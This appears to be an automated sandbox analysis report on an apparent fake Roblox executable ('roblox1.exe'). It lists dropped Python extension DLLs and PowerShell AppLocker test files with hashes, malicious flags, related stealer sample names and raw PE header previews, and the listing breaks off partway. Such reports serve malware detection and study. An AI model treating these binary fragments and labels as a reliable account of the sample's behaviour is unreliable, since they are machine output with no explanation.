                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzmd1by3.ez1.psm1

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2vmrj2i.0sm.psm1

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):64424
                                                                                                                                                                                                                                  Entropy (8bit):6.124000794465739
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:r/p7Wh7XUagO7BR4SjavFHx8pIS5nWQ7Sy7o:r/tWhzUahBR4Sjahx8pIS5n5Fo
                                                                                                                                                                                                                                  MD5:6EB3C9FC8C216CEA8981B12FD41FBDCD
                                                                                                                                                                                                                                  SHA1:5F3787051F20514BB9E34F9D537D78C06E7A43E6
                                                                                                                                                                                                                                  SHA-256:3B0661EF2264D6566368B677C732BA062AC4688EF40C22476992A0F9536B0010
                                                                                                                                                                                                                                  SHA-512:2027707824D0948673443DD54B4F45BC44680C05C3C4A193C7C1803A1030124AD6C8FBE685CC7AAF15668D90C4CD9BFB93DE51EA8DB4AF5ABE742C1EF2DCD08B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: roblox.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: random.exe.6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: end.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win64.Malware-gen.19901.26035.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.PWS.Stealer.39881.9434.15338.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.~[b...b...b...k..`.......`.......n.......j.......a.......a.......`...b..........c.......c.......c.......c...Richb...........PE..d....K.b.........." ... .T..........`...............................................^.....`.............................................P...P...d........................)...........w..T...........................@v..@............p.. ............................text....R.......T.................. ..`.rdata...I...p...J...X..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_bz2.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):83368
                                                                                                                                                                                                                                  Entropy (8bit):6.530099411242372
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:asRz7qNFcaO6ViD4fhaLRFc/a8kd7jzWHCxIStVs7Sywk:9RzGYYhaY9kd7jzWixIStVs+k
                                                                                                                                                                                                                                  MD5:A4B636201605067B676CC43784AE5570
                                                                                                                                                                                                                                  SHA1:E9F49D0FC75F25743D04CE23C496EB5F89E72A9A
                                                                                                                                                                                                                                  SHA-256:F178E29921C04FB68CC08B1E5D1181E5DF8CE1DE38A968778E27990F4A69973C
                                                                                                                                                                                                                                  SHA-512:02096BC36C7A9ECFA1712FE738B5EF8B78C6964E0E363136166657C153727B870A6A44C1E1EC9B81289D1AA0AF9C85F1A37B95B667103EDC2D3916280B6A9488
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{..{..{...#.{......{....M.{......{......{......{......{..Z...{..{...{......{......{....O.{......{..Rich.{..........PE..d....K.b.........." ... .....^..............................................P......& ....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_cffi_backend.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):178176
                                                                                                                                                                                                                                  Entropy (8bit):6.160618368535074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:a28mc0wlApJaPh2dEVWkS0EDejc2zSTBcS7EkSTLkKDtJbtb:axTlApohBV1S0usWchkSTLLDDt
                                                                                                                                                                                                                                  MD5:2BAAA98B744915339AE6C016B17C3763
                                                                                                                                                                                                                                  SHA1:483C11673B73698F20CA2FF0748628C789B4DC68
                                                                                                                                                                                                                                  SHA-256:4F1CE205C2BE986C9D38B951B6BCB6045EB363E06DACC069A41941F80BE9068C
                                                                                                                                                                                                                                  SHA-512:2AE8DF6E764C0813A4C9F7AC5A08E045B44DAAC551E8FF5F8AA83286BE96AA0714D373B8D58E6D3AA4B821786A919505B74F118013D9FCD1EBC5A9E4876C2B5F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p...p...p.y.q...p.y{p...p.y.q...p.y.q...p.y.q...p.q...pi..q...p...pX..p.x.q...p...p...p.x.q...p.xyp...p.x.q...pRich...p................PE..d......f.........." ...).....B.............................................. ............`.........................................PX..l....X.......................................?...............................=..@............................................text............................... ..`.rdata..............................@..@.data....].......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ctypes.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):122792
                                                                                                                                                                                                                                  Entropy (8bit):6.021506515932983
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:bsQx9bm+edYe3ehG+20t7MqfrSW08UficVISQPkFPR:QQxCOhGB0tgqfrSiUficrZ
                                                                                                                                                                                                                                  MD5:87596DB63925DBFE4D5F0F36394D7AB0
                                                                                                                                                                                                                                  SHA1:AD1DD48BBC078FE0A2354C28CB33F92A7E64907E
                                                                                                                                                                                                                                  SHA-256:92D7954D9099762D81C1AE2836C11B6BA58C1883FDE8EEEFE387CC93F2F6AFB4
                                                                                                                                                                                                                                  SHA-512:E6D63E6FE1C3BD79F1E39CB09B6F56589F0EE80FD4F4638002FE026752BFA65457982ADBEF13150FA2F36E68771262D9378971023E07A75D710026ED37E83D7B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T....ne..ne..ne......ne.p.d..ne.p.`..ne.p.a..ne.p.f..ne.t.d..ne...a..ne...d..ne...d..ne..nd..ne.t.h..ne.t.e..ne.t....ne.t.g..ne.Rich.ne.........PE..d....K.b.........." ... ............P[..............................................H.....`..........................................Q.......R...........................).......... ...T...............................@...............@............................text............................... ..`.rdata..nl.......n..................@..@.data...D>...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_decimal.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):250280
                                                                                                                                                                                                                                  Entropy (8bit):6.547354352688139
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:TogRj7JKM8c7N6FiFUGMKa3xB6Dhj9qWMa3pLW1A64WsqC:tPJKa7N6FEa3x4NlbqC
                                                                                                                                                                                                                                  MD5:10F7B96C666F332EC512EDADE873EECB
                                                                                                                                                                                                                                  SHA1:4F511C030D4517552979105A8BB8CCCF3A56FCEA
                                                                                                                                                                                                                                  SHA-256:6314C99A3EFA15307E7BDBE18C0B49BC841C734F42923A0B44AAB42ED7D4A62D
                                                                                                                                                                                                                                  SHA-512:CFE5538E3BECBC3AA5540C627AF7BF13AD8F5C160B581A304D1510E0CB2876D49801DF76916DCDA6B7E0654CE145BB66D6E31BD6174524AE681D5F2B49088419
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7.......................................+.........c.........................[...........Rich...........PE..d....K.b.........." ... .p...:.......................................................^....`..........................................D..P...@E...................'.......)......@...p...T...........................0...@............................................text...]o.......p.................. ..`.rdata...............t..............@..@.data....)...`...$...L..............@....pdata...'.......(...p..............@..@.rsrc...............................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_hashlib.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61864
                                                                                                                                                                                                                                  Entropy (8bit):6.210920109899827
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:aSz5iGzcowlJF+aSe3kuKUZgL4dqDswE9+B1fpIS5IHYiSyvc9eEdB:npWlJF+aYupZbdqDOgB1fpIS5IH7Sy+V
                                                                                                                                                                                                                                  MD5:49CE7A28E1C0EB65A9A583A6BA44FA3B
                                                                                                                                                                                                                                  SHA1:DCFBEE380E7D6C88128A807F381A831B6A752F10
                                                                                                                                                                                                                                  SHA-256:1BE5CFD06A782B2AE8E4629D9D035CBC487074E8F63B9773C85E317BE29C0430
                                                                                                                                                                                                                                  SHA-512:CF1F96D6D61ECB2997BB541E9EDA7082EF4A445D3DD411CE6FD71B0DFE672F4DFADDF36AE0FB7D5F6D1345FBD90C19961A8F35328332CDAA232F322C0BF9A1F9
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zD.A>%..>%..>%..7]..:%..^_..<%..^_..2%..^_..6%..^_..=%..Z_..<%...W..<%...\..=%..>%...%..Z_..?%..Z_..?%..Z_..?%..Z_..?%..Rich>%..................PE..d....K.b.........." ... .P...z.......<..............................................Np....`............................................P...@............................)......X....l..T............................k..@............`..(............................text....N.......P.................. ..`.rdata..VM...`...N...T..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_lzma.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):158120
                                                                                                                                                                                                                                  Entropy (8bit):6.838169661977938
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:MeORg8tdLRrHn5Xp4znfI9mNoY6JCvyPZxsyTxISe1KmDd:M/Rgo1L5wwYOY6MixJKR
                                                                                                                                                                                                                                  MD5:B5FBC034AD7C70A2AD1EB34D08B36CF8
                                                                                                                                                                                                                                  SHA1:4EFE3F21BE36095673D949CCEAC928E11522B29C
                                                                                                                                                                                                                                  SHA-256:80A6EBE46F43FFA93BBDBFC83E67D6F44A44055DE1439B06E4DD2983CB243DF6
                                                                                                                                                                                                                                  SHA-512:E7185DA748502B645030C96D3345D75814BA5FD95A997C2D1C923D981C44D5B90DB64FAF77DDBBDC805769AF1BEC37DAF0ECEE0930A248B67A1C2D92B59C250C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m....................................................<.........................................Rich...........................PE..d....L.b.........." ... .d...........8...............................................p....`.........................................0%..L...|%..x....p.......P.......@...)......H.......T...........................`...@............................................text...^c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..H............>..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_multiprocessing.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33192
                                                                                                                                                                                                                                  Entropy (8bit):6.3186201273933635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Y3I65wgJ5xeSZg2edRnJ8ZISRtczYiSyvZCeEdP:gIgJ5Uqg2edRJ8ZISRtcz7Sy0b
                                                                                                                                                                                                                                  MD5:71AC323C9F6E8A174F1B308B8C036E88
                                                                                                                                                                                                                                  SHA1:0521DF96B0D622544638C1903D32B1AFF1F186B0
                                                                                                                                                                                                                                  SHA-256:BE8269C83666EAA342788E62085A3DB28F81512D2CFA6156BF137B13EBEBE9E0
                                                                                                                                                                                                                                  SHA-512:014D73846F06E9608525A4B737B7FCCBE2123D0E8EB17301244B9C1829498328F7BC839CC45A1563CF066668EA6E0C4E3A5A0821AB05C999A97C20AA669E9EDA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.+.>.x.>.x.>.x.Fgx.>.x.D.y.>.x.D.y.>.x.D.y.>.x.D.y.>.x.D.y.>.x.>.x.>.xmL.y.>.x.D.y.>.x.D.y.>.x.D.x.>.x.D.y.>.xRich.>.x........................PE..d....K.b.........." ... .....<......0....................................................`.........................................0D..`....D..x....p.......`.......X...)...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_overlapped.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):48552
                                                                                                                                                                                                                                  Entropy (8bit):6.319402195167259
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:9i4KJKYCKlBj7gKxwfZQ7ZlYXF1SVMHE4ftISstDYiSyvM+eEd2:hKJfBuAA1SVWBftISstD7Syti
                                                                                                                                                                                                                                  MD5:7E6BD435C918E7C34336C7434404EEDF
                                                                                                                                                                                                                                  SHA1:F3A749AD1D7513EC41066AB143F97FA4D07559E1
                                                                                                                                                                                                                                  SHA-256:0606A0C5C4AB46C4A25DED5A2772E672016CAC574503681841800F9059AF21C4
                                                                                                                                                                                                                                  SHA-512:C8BF4B1EC6C8FA09C299A8418EE38CDCCB04AFA3A3C2E6D92625DBC2DE41F81DD0DF200FD37FCC41909C2851AC5CA936AF632307115B9AC31EC020D9ED63F157
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|.K{8.%(8.%(8.%(1..(<.%(X.$):.%(X. )4.%(X.!)0.%(X.&);.%(\.$):.%(8.$(N.%(.$)=.%(.!)9.%(\.()9.%(\.%)9.%(\..(9.%(\.')9.%(Rich8.%(........PE..d....K.b.........." ... .>...X...... ................................................o....`..........................................w..X...(x...........................)...... ....V..T............................U..@............P...............................text....<.......>.................. ..`.rdata...4...P...6...B..............@..@.data................x..............@....pdata..............................@..@.rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_queue.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30632
                                                                                                                                                                                                                                  Entropy (8bit):6.41055734058478
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:lez/Dt36r34krA4eVIS7UAYiSyvAEYeEdSiD:leDE34krA4eVIS7UA7Sy9YLD
                                                                                                                                                                                                                                  MD5:23F4BECF6A1DF36AEE468BB0949AC2BC
                                                                                                                                                                                                                                  SHA1:A0E027D79A281981F97343F2D0E7322B9FE9B441
                                                                                                                                                                                                                                  SHA-256:09C5FAF270FD63BDE6C45CC53B05160262C7CA47D4C37825ED3E15D479DAEE66
                                                                                                                                                                                                                                  SHA-512:3EE5B3B7583BE1408C0E1E1C885512445A7E47A69FF874508E8F0A00A66A40A0E828CE33E6F30DDC3AC518D69E4BB96C8B36011FB4EDEDF9A9630EF98A14893B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.~Zb...b...b...k..`.......`.......n.......j.......a.......a.......`...b...+.......c.......c.......c.......c...Richb...........................PE..d....K.b.........." ... .....8.......................................................F....`..........................................C..L....C..d....p.......`.......N...)..........`4..T........................... 3..@............0..(............................text............................... ..`.rdata..2....0......................@..@.data...x....P.......:..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_socket.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):77736
                                                                                                                                                                                                                                  Entropy (8bit):6.247935524153974
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:C6DucXZAuj19/s+S+pjtk/DDTaVISQwn7SyML:C6DPXSuj19/sT+ppk/XWVISQwneL
                                                                                                                                                                                                                                  MD5:E137DF498C120D6AC64EA1281BCAB600
                                                                                                                                                                                                                                  SHA1:B515E09868E9023D43991A05C113B2B662183CFE
                                                                                                                                                                                                                                  SHA-256:8046BF64E463D5AA38D13525891156131CF997C2E6CDF47527BC352F00F5C90A
                                                                                                                                                                                                                                  SHA-512:CC2772D282B81873AA7C5CBA5939D232CCEB6BE0908B211EDB18C25A17CBDB5072F102C0D6B7BC9B6B2F1F787B56AB1BC9BE731BB9E98885C17E26A09C2BEB90
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...ry..ry..ry..{.g.ty......py.......y......zy......qy......py..ry...y......uy......sy......sy......sy......sy..Richry..................PE..d....K.b.........." ... .l.......... &.......................................P.......Q....`.............................................P...P........0....... ..l........)...@.........T...............................@............................................text...Rj.......l.................. ..`.rdata...s.......t...p..............@..@.data...............................@....pdata..l.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_sqlite3.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):97704
                                                                                                                                                                                                                                  Entropy (8bit):6.173518585387285
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:GzgMWYDOavuvwYXGqijQaIrlIaiP9NbTp9c4L7ZJkyDpIS5Qux7Syce:NFYqDPSQaIrlI/DbLc2tJkyDpIS5QuxZ
                                                                                                                                                                                                                                  MD5:7F61EACBBBA2ECF6BF4ACF498FA52CE1
                                                                                                                                                                                                                                  SHA1:3174913F971D031929C310B5E51872597D613606
                                                                                                                                                                                                                                  SHA-256:85DE6D0B08B5CC1F2C3225C07338C76E1CAB43B4DE66619824F7B06CB2284C9E
                                                                                                                                                                                                                                  SHA-512:A5F6F830C7A5FADC3349B42DB0F3DA1FDDB160D7E488EA175BF9BE4732A18E277D2978720C0E294107526561A7011FADAB992C555D93E77D4411528E7C4E695A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........dQ...?...?...?..}....?..>...?......?..:...?..;...?..<...?..>...?.;w>...?...>...?..2...?..?...?......?..=...?.Rich..?.................PE..d....L.b.........." ... ............................................................4.....`.............................................P....................`.......T...)..............T...............................@...............`............................text...n........................... ..`.rdata...p.......r..................@..@.data...,....@......................@....pdata.......`.......2..............@..@.rsrc................F..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):159144
                                                                                                                                                                                                                                  Entropy (8bit):6.002098953253968
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:UhIDGtzShE3z/JHPUE0uev5J2oE/wu3rE923+nuI5Piev9muxISt710Y:UhIqtzShE3zhvyue5EMnuaF9mu3
                                                                                                                                                                                                                                  MD5:35F66AD429CD636BCAD858238C596828
                                                                                                                                                                                                                                  SHA1:AD4534A266F77A9CDCE7B97818531CE20364CB65
                                                                                                                                                                                                                                  SHA-256:58B772B53BFE898513C0EB264AE4FA47ED3D8F256BC8F70202356D20F9ECB6DC
                                                                                                                                                                                                                                  SHA-512:1CCA8E6C3A21A8B05CC7518BD62C4E3F57937910F2A310E00F13F60F6A94728EF2004A2F4A3D133755139C3A45B252E6DB76987B6B78BC8269A21AD5890356AD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........dI...'L..'L..'L.}.L..'L..&M..'L.."M..'L..#M..'L..$M..'L..&M..'Lz|&M..'L..&Lt.'L)w&M..'L..*M..'L..'M..'L...L..'L..%M..'LRich..'L................PE..d....K.b.........." ... ............l*...................................................`............................................d...4........`.......P.......D...)...p..<.......T...............................@............................................text...x........................... ..`.rdata..J...........................@..@.data....j.......f..................@....pdata.......P....... ..............@..@.rsrc........`.......,..............@..@.reloc..<....p.......6..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_uuid.pyd

